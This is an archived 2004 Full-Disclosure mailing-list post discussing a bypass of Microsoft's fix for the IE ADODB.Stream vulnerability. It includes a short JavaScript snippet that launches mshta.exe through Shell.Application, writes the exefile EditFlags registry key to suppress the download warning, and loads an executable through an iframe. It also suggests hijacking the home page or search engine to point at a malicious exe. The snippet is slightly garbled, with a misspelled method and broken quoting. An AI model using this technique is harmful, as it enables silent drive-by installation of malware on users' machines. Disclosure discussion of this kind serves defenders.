[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out

To: <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
Date: Sat, 3 Jul 2004 02:06:32 -0000


 still have to contend with mshta.exe calling out through the 
iframe and more than likely firewalled long ago, so use it to 
write the registry to kill the download warning, then use it set 
the browser home page as http://www..../foo.exe, that or the 
default search engine.

tons of possibilities.

Well done Matthew !

 <!--
 
ActiveXObject("Shell.Application");
obj.ShellExecut("mshta.exe","about:<script>var wsh=new 
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");)
</script><iframe src=foo.exe>");

 -->


On quick reflection, I completely missed Matthew's point. It's 
brilliant. If you can indeed kill the download dialog, kill it, 
stick a frame in it and bang. If it doesn't work, use the 
regWrite and re-set the adodb.stream instead, and continue on 
your merry way. 


-- 
http://www.malware.com





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] Web sites compromised by IIS attack
Next by Date: Re: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
Previous by thread: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
Next by thread: [Full-Disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
Index(es):
- Date
- Thread